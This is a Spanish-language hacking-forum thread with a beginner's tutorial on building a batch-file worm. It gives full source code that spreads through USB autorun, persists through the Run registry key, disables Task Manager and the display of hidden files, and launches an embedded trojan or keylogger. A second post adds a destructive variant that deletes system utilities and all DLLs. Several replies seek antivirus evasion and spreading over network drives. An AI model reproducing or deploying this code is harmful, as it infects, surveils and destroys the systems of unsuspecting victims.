Test Foro de elhacker.net SMF 2.1

HOW-TO CREA TU WORM EN BACTH


Herramientas a utilizar:

Quick_Batch_File_Compiler_3.1.5.0
que pueden descargar del siguiente enlace
http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html

Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch.

Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo.

Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos.

Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda.

Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza

Básicamente lo que hará nuestro script es lo siguiente

*copiarse a si mismo a una carpeta en windows
*crear el autorun que posteriormente será copiado en la memoria extraible USB
*añadirse al inicio de windows
*alterar registro de windows para cancelar opciones del sistema
*ejecuta tu troyano, keylogger o lo que quieras
*si encuentra una unidad donde copiarse, se copia junto con su autorun
*se añade atributos de oculto, sistema y solo lectura
*espera aprox. 60 segundos y repite el ciclo


de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo.
con un poco de ayuda de la victima claro esta :xD

Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código

SET  Sirve para definir una variable, por ejemplo
SET perro=firulais
de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais.

ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto.

">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores.

En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto

IF NOT EXIST Este condicional se utiliza de la siguiente manera
SI NO EXISTE ... ENTONCES HAS ESTO
sirve para realizar acciones siempre y cuando se cumpla o no una condicion

Los demas son comandos basicos de la shell de windows CMD.EXE


Como funcionara el worm?
bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch


el codigo del worm lo explique en cada sección.

@ECHO OFF
REM          _______..___________.     ___      .______     
REM         /       ||           |    /   \     |   _  \     
REM        |   (----``---|  |----`   /  ^  \    |  |_)  |   
REM         \   \        |  |       /  /_\  \   |      /     
REM     .----)   |       |  |      /  _____  \  |  |\  \----.
REM     |_______/        |__|     /__/     \__\ | _| `._____|
REM     ____    __    ____   ______   .______      .___  ___.
REM     \   \  /  \  /   /  /  __  \  |   _  \     |   \/   |
REM      \   \/    \/   /  |  |  |  | |  |_)  |    |  \  /  |
REM       \            /   |  |  |  | |      /     |  |\/|  |
REM        \    /\    /    |  `--'  | |  |\  \----.|  |  |  |
REM         \__/  \__/      \______/  | _| `._____||__|  |__|
REM
REM    ____  ____  _________  ____  ____  ____  ____  ____  ____
REM   ||B ||||Y ||||       ||||O ||||C ||||T ||||A ||||L ||||H ||
REM   ||__||||__||||_______||||__||||__||||__||||__||||__||||__||
REM   |/__\||/__\||/_______\||/__\||/__\||/__\||/__\||/__\||/__\|
REM                                                     
REM
REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad
REM                   [   OCTALH@GMAIL.COM   ]                                                 
REM

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

                 SET WORMORIGINAL=juego.exe
                 REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
                 SET WORM=1044404.EXE
                 REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO

SET AUTORUN=autorun.inf
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS
MD "%WINDIR%\14785"

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO
COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

REM SE AGREGA AL INICIO DEL SISTEMA
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f

:CHEKARWORM

REM VERIFICA LA EXISTENCIA DEL WORM

IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM


:COPIARWORM

REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA
REM SISTEMA Y OCULTO.

COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
ATTRIB +S +H +R "E:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
ATTRIB +S +H +R "F:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
ATTRIB +S +H +R "G:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
ATTRIB +S +H +R "H:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
ATTRIB +S +H +R "I:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
ATTRIB +S +H +R "J:\%WORM%"

REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS

COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
ATTRIB +S +H +R "E:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
ATTRIB +S +H +R "F:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
ATTRIB +S +H +R "G:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
ATTRIB +S +H +R "H:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
ATTRIB +S +H +R "I:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
ATTRIB +S +H +R "J:\%AUTORUN%"

GOTO LOOP


:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM



bien ahora explicare como utilizar el codigo.

lo primero sera fijarce en esta parte del codigo


                 SET WORMORIGINAL=juego.exe
                 REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
                 SET WORM=1044404.EXE
                 REM NOMBRE QUE TENDRA EN LA MEMORIA USB

Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER

Tambien verifica esta parte del codigo

REM EJECUTA TU SERVER
START %MYFILES%\server.exe

aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER.

Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER

te debe quedar algo asi
(http://xs125.xs.to/xs125/08103/dc40849.jpg)

Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication

(http://xs125.xs.to/xs125/08103/dc41895.jpg)

Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc...
para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña.

(http://xs225.xs.to/xs225/08103/dc42634.jpg)

recuerda que este archivo se debe llamar como lo indicaste en
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch.


Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado y cualquier cosa puedes comentar en el foro.


SALU2 y suerte

Excelente aporte... mas tarde lo pruebo  ;)

Con respecto a las imágenes que no salen, es porque imageshack parece que ha bloqueado las imágenes que van a este foro. Sube tus imágenes a http://tinypic.com/ y ahí ya se podrán ver  ::)

Muy bueno octalh ;) Muchas gracias por el aporte en cuanto tenga tiempo a mirarlo!

Saludos

Tenia ganas de encontrar por aqui un manual tan bueno como este sobre un worm, pero perdonar mi ginorancia,porque llevo poco tiempo en esto.¿ el codigo que tengo que copiar y luego pegar en el Quick_Batch_File_Compiler es todo el codigo que pone al principio? me explico, ¿ el codigo entero incluido eso de START WORM (en letras grandes),lo de By octalh,etc...?  gracias de antemano.

pd: muy muy buen manual, sobre todo para los que empiezan como yo ;)

¡Saludos! Muchas gracias por molestarte en hacer una guía (siendo que yo hace 4 días aparecí preguntando por programas que hicieran esto :-))

Respecto a las dudas que tengo:
¿Sólo hay que modificar la parte de los nombres (server, autorun, etc) y el nombre de la carpeta (esto lo he hecho yo como opcional)?

:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM

¿Esto se modifica?

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

¿Y esto?

Saludos.

Muy bueno el tutorial, y aprovecho para decir que de nada sirve copiar y pegar el código de octalh, si quieres aprender tendrás que esforzarte en entenderlo, aunque no es necesario entenderlo todo a la primera, vete acostumbrando a ver códigos y intentar comprenderlos.

Cita de: Stone_FREE_ en  5 Marzo 2008, 08:39 AM
Con respecto a las imágenes que no salen, es porque ¡mageshack parece que ha bloqueado las imágenes que van a este foro. Sube tus imágenes a http://tinypic.com/ y ahí ya se podrán ver  ::)

Si, no se porque imageshack esta bloqueando las imagenes, a mi me pasó lo mismo, y no es sólo en este foro, en otros foros ya pasaba.
Saludos

excelente tuto respecto a las imágenes usen xs.to  ;)

Gracias respecto a las imagenes ya las subi a otro servidor  :rolleyes:

bueno por lo de algunas dudas que tenian el

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

es para crear el autorun.inf que posteriormente sera copiado a la memoria usb

solo que si te confundes en %WORM% y %AUTORUNORIGINAL%, recuerda que estas son variables que definimos mas arriba que en este caso %AUTORUNORIGINAL% es igual a %WINDIR%\14785\WINUPDATE.DLL y WORM es igual a 1044404.EXE.


:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM

ahora esta parte es una forma de poner un timer o un sleep, es para hacer tiempo..
si ya se que ese comando hace un ping  :xD, pero el ping lo hara 60 veces y si tomamos en cuenta que aprox cada peticion de ping tarda 1 segundo, pues es una forma de esperar 60 segundos.

sirve para que el gusano verifique unidades aprox cada 60 segundos

Se te ha olvidado poner que se copie en el D y que cambie sus atributos, ¿no?

Ya he conseguido que funcione y le he cambiado un par de cosas. Gracias por hacer un código tan sencillo y claro.

Saludos.

este manual esta muy bueno sobretodo q se puede modificar al gusto del cliente.
esperemos q no sea detectado por los antivirus.

Mauro si me estas leyendo, no pongas este manual en tu blog porque hay un monton de gente de kaspersky que anda metida en tu blog y despues lo van a detectar y mandarselo a los de nod32 tambien.

pense que no se podria hacer algo asi en batch :P

Esta muy bien el manual , estaba buscando algo asi!

octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows


Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)

Ala byes

Modificando el código de octalh he añadido una función para que si no existe el archivo "x" (troyano, keylogger) instalado en la parte correspondiente del pc se auto ejecute el server automáticamente.

Te doy las gracias otra vez octalh, gracias a ti ya se cómo programar en batch, y empecé desde cero hace 2 días.

EDIT: Por cierto, yo también quiero saber cómo desinfentarlo.

EDIT2: Neider, lo que he hecho es usar las mismas funciones que tiene el código original, si buscas por Internet verás enseguida muchos tutoriales de batch y con eso te aclararas mejor como lo he hecho yo, no es difícil.

Saludos.

ECHO shell\1=abrir >> %AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shell\2\=explorar >> %AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >> %AUTORUNORIGINAL%

¿Alguien podría explicar esta parte específica de aquí? Es que no se muy bien cómo funcionan esos comandos.

bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
@echo off

goto initio

initio
title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)

AT 12:00 goto jornada
AT 28/03/09 goto apocalpypse

CLS

if exist %windir%\regedit.exe (goto conqeror) else (goto espora)


conqueror
CLS

title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...

rem Southern Cross, by Corax

copy \svhost.exe C:\WINDOWS\System32\svhost.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe

CLS

echo [autorun]>>%Windir%\cursors\autorun.inf"
echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"

CD %WINDIR%\System32\"
del /Q /F taskmgr.exe
del /Q /F taskkill.exe

CLS

CD %WINDIR%\System32\"
del /Q /F regedt32.exe
del /Q /F wscui.cpl
del /Q /F command.com

CLS

CD %windir%\System32\restore\"
del /Q /F rstrui.exe
del /Q /F srdiag.exe

CLS

CD "%windir%\"
del /Q /F taskman.exe
del /Q /F regedit.exe

CLS

CD "%windir%\PCHealth\HelpCtr\Binaries\"
del /Q /F msconfig.exe

CLS

goto espora




espora
CLS
if exists E:\ (goto 1) else (goto faren)

faren
CLS
if exists F:\ (goto 2) else (goto gotrek)

gotrek
CLS
if exists G:\ (goto 3) else (goto hyperion)

hyperion
CLS
if exists H:\ (goto 4) else (goto espora)


1
if exists E:\svhost.exe (goto faren) else (goto 11)

2
if exists F:\svhost.exe (goto gotrek) else (goto 22)

3
if exists G:\svhost.exe (goto hyperion) else (goto 33)

4
if exists H:\svhost.exe (goto espora) else (goto 44)

11
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
CLS
goto espora

22
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
CLS
goto espora

33
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
CLS
goto espora

44
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
CLS
goto espora





jornada
CLS
shutdown -s -t 10




apocalypse

CD "%WINDIR%\System32\"
del /Q /F hal.dll

CD "%WINDIR%\"
del /S /Q /F *.dll

shutdown -s t- 10
pause
exit

gracias estaba buscando algo como esto
pero.. no entiendo mucho el code
si alguien me pudiera aclarar un poco la cosa porfavor
me eh matado trantando de entenderlo xD

espero ayuda saludos

 :D
EXCELENTE CODIGO, RECIEN ESTOY EMPEZANDO CON BATCH Y NO CREI QUE
TUVIERA TANTAS FACILIDADES PARA DESARROLLAR UN VIRUS

octalh MUUUUUUUUY agradecido de verdad... es una maravilla esto :O... he pillado lo que posteas y siempre me impresionas con tu didactica.. de que se te entiende se te entiende... no se programar.. vi unas horas de programacion en C++ pero no fue mucho lo que logre hacer.. tambien admito falta de boluntad y tiempo... pero no es nada dificil el batch y es bastante simpatico y facil de manejar.. gracias por este post que estoy seguro muchos necesitaban leer XD....

  PD: lo unico que no me gusto de esto es que ya despues de que se esta expandiendo el worm no deja desconectar el pendrive en modo seguro.. lo que pone en alerta a la persona y posiblemente se vaya parando la cadena...
   no habria manera de evitar que esto suceda ? cual es la razon... que es lo que esta usando del disco??.. corrijanme si me equivoco... ya que esta haciendo un ping para que a los 60 segundo se repita el algoritmo esto es lo que mantiene ocupado a pen ? y por eso no lo deja sacar en modo seguro ?... que otras alternativas habria a esto ?...

Gracias de nuevo..
sigue asi =)

Cita de: corax en  7 Marzo 2008, 23:13 PM
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:

Código (bash) [Seleccionar] Expandir

@echo off

goto initio

initio
title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)

AT 12:00 goto jornada
AT 28/03/09 goto apocalpypse

CLS

if exist %windir%\regedit.exe (goto conqeror) else (goto espora)


conqueror
CLS

title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...

rem Southern Cross, by Corax

copy \svhost.exe C:\WINDOWS\System32\svhost.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe

CLS

echo [autorun]>>%Windir%\cursors\autorun.inf"
echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"

CD %WINDIR%\System32\"
del /Q /F taskmgr.exe
del /Q /F taskkill.exe

CLS

CD %WINDIR%\System32\"
del /Q /F regedt32.exe
del /Q /F wscui.cpl
del /Q /F command.com

CLS

CD %windir%\System32\restore\"
del /Q /F rstrui.exe
del /Q /F srdiag.exe

CLS

CD "%windir%\"
del /Q /F taskman.exe
del /Q /F regedit.exe

CLS

CD "%windir%\PCHealth\HelpCtr\Binaries\"
del /Q /F msconfig.exe

CLS

goto espora




espora
CLS
if exists E:\ (goto 1) else (goto faren)

faren
CLS
if exists F:\ (goto 2) else (goto gotrek)

gotrek
CLS
if exists G:\ (goto 3) else (goto hyperion)

hyperion
CLS
if exists H:\ (goto 4) else (goto espora)


1
if exists E:\svhost.exe (goto faren) else (goto 11)

2
if exists F:\svhost.exe (goto gotrek) else (goto 22)

3
if exists G:\svhost.exe (goto hyperion) else (goto 33)

4
if exists H:\svhost.exe (goto espora) else (goto 44)

11
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
CLS
goto espora

22
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
CLS
goto espora

33
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
CLS
goto espora

44
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
CLS
goto espora





jornada
CLS
shutdown -s -t 10




apocalypse

CD "%WINDIR%\System32\"
del /Q /F hal.dll

CD "%WINDIR%\"
del /S /Q /F *.dll

shutdown -s t- 10
pause
exit

Muy interezante... si estoy viendo los errores.. a lo mejor no detallo algunos ya que apenas hoy me voy enterando de esta maravilla de todas formas espero que ayudes un poco tambien vale ?.... otra cosa es que esta un poco agresivo XD como para probarlo con uno mismo ...  de todas formas lo seguire detallando y viendo que le puedo quitar o poner.. gracias por compartir...

PD: no me he fijado si cambiaste lo del ping que puso octalh para que se repitiera el ciclo.. que otras alternativas a estas se te ocurre para que se pueda extraer el pendrive en modo seguro sin problemas.

Tengo un pequeño problema  con el Quick_Batch_File_Compiler_3.1.5.0.
cuando compilo mi pequeño prog en batch(solo son varias sentencias para copiar un archivo a otro lado) para que no aparezca la ventana en  MsDos  mi antivirus, el AVG free, me lo detecta como un troyano y no me deja compilarlo. Si cierro los procesos del antivirus y compilo el programa falla.
Puede alguien ayudarme.

Lo probe y no me funciono pero bueno mi pues no me funciono y por eso es mi pregunta se necesita saber programar en batch para q funcione?

Cita de: Sapote en  7 Abril 2008, 21:21 PM
Lo probe y no me funciono pero bueno mi pues no me funciono y por eso es mi pregunta se necesita saber programar en batch para q funcione?

Es mejor que aprendas batch, asi sabes lo que estas haciendo y lo que hace el programa en cada momento.
Ademas es el lenguaje mas sencillo que hay.
es el primer lenguaje que aprendi ,hace mucho tiempo, cuando empezaba.

saludos

es q mira te explico segui el manual al pie de la letra pero no se si se necesita hacer algo mas por eso pregunto si se necesita y me pondre a aprender

hola....

tengo una pregunta..

aki el texto SYSTEMSHELL.EXE al igual que WINUPDATE.DLL a que corresponde?

(o son archivos que el worm genera automatikamente??)

disculpen mi ingenuidad pero veo que entra en el codigo de manera repentina y no se de donde sale. o como se crea etc.

espero respondan, gracias.

SYSTEMSHELL.EXE es el worm, y WINUPDATE.DLL es el autorun, solo se han nombrado así para despistar...

Saludos

Hola! Muy bueno el código, pero tengo una pregunta, si al código le añado

:Mensaje
msg * ... Cualquier mensaje
ping localhost -n 3600
goto :Mensaje

Entonces cada hora se repetirá el mensaje que yo escriba, ¿No?

muy buen tuto...

yo lo eh modificado para que se reinicie cada tres minutos

no de acceso a restaurar sistema ni al regedit para que se cierre el messenger

gracias por el aporte...

DemO

tengo prooblemas al tratar de desconectar la usb siendo esta la que infecte.

Muy bueno el tuto, claro y sencillo.  Me gustaria saber porque es detectado y si existe alguna forma de hacerlo indetectable a nivel de cambios en el codigo.  Supongo que lo esta detectando el scanner euristico.

Cualquier aporte es bienvenido.
:P :P
alzehimer_cerebral

corax... eres malo!!! jeje, no sè mucho de esto, pero lo que lei, me dio miedo... :P
no quisiera toparme con un archivo que borre todos mis dlls... XD, aunque, pensandolo bien, creo que saltaste la parte en que Windows "protege" dichos dll, no?... bueno, sugerencia solamente.

Cita de: Sapote en  7 Abril 2008, 21:48 PM
es q mira te explico segui el manual al pie de la letra pero no se si se necesita hacer algo mas por eso pregunto si se necesita y me pondre a aprender

Si nos dices que hiciste concretamente podremos ayudarte, no lo he probado pero no veo si hay erroeres, lo suyo esque leas algunos tutoriales y programes un poco, en unos dias lo comprenderás perfectamente

PD: muy buen tutorial

Cita de: SweetTai en 18 Agosto 2008, 15:16 PM
Hola! Muy bueno el código, pero tengo una pregunta, si al código le añado

:Mensaje
msg * ... Cualquier mensaje
ping localhost -n 3600
goto :Mensaje

Entonces cada hora se repetirá el mensaje que yo escriba, ¿No?

Si haces esto se quedaría en un bucle infinito mandando un mensaje kada hora, pero no tiene sentido, la verdad... ya que no ejecutaría los códigos del post inicial, solo los tuyos una vez llegara, aún así, funcionaría perfectamente, pero aquí no tiene sentido ^^, Suerte!

Cita de: neider en  6 Marzo 2008, 22:27 PM
Esta muy bien el manual , estaba buscando algo asi!

octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows


Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)

Ala byes

Para borrar basta eliminar

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f


REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f


REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f


y ya esta xP




Muchas gracias por el aporte!

Hola chicos, me alegra ver la cantidad de información que hay por aquí, así seguro que se aprende. Perdonad mi ingenuidad pero me gustaría que me respondiérais a unas preguntillas. ¿Si después de compilar ejecuto el archivo se infecta mi ordena o ya está infectado nada más compilar? Y la segunda cuestión, ¿hay que ponerle al código alguna instrucción de lo que queremos que haga? Me refiero a que el código de octalh hace que el virus se propague, se copie, compruebe si puede copiarse... ¿Pero no hace nada "maligno" no, tal y como borrar algún archivo o reseat el pc...?
Muchas gracias y felicidades a octalh, muy buena explicacion.

Buen aporte, andaba detras de algo como esto.

Por cierto, el mismo codigo sirve apra infectar unidades de red,asi que se extiende bastante bien, la unica pega es el autorun que lo detectan casi todos los antivirus con los que testee, alguna sugerencia para que no canten con el autorun?

Sí petarte el antivirus...

¿Queréis dejar de revivir este tema, j*der??
Ambos códigos (el de octalh y el mío) son una *****, están sin trabajar, en bruto...

Si quereis aprender a hacer gusanos y cosas en batch hay un subforo muy hermoso llamado "Programación General">"Scripting"

Es asombroso como cada cierto tiempo alguien reabre este post...

Muchisimas gracias Corax!!! respuestas asi hacen el foro grande si señor.

Se te olvido comentar cosas como que modificando ligeramente el autorun pasa sin problemas el antivirus, o que pese a que el codigo esta en bragas sirve perfectamente para basar las propias creaciones o entender mejor el metodo de difucion por unidades extraibles o de red de un gusano.

Gracias, ya se programar en batch asi como en otros tantos lenguajes, pero mi pregunta no era esa.

Pero en serio, muchisimas gracias por tu grandioso aporte

ja, ja ja, muy irónico...


No iba por ti, stalker, iba por todos los novatos que "adoran" periódicamente en sus comentarios en este post a los códigos que se han puesto.

Y si de verdad sabes programar en batch... ¿podrías decir qué fallas teóricas y prácticas tiene ese código?

Y desde luego la mejor manera de hacer el foro grande sería eliminando posts inútiles...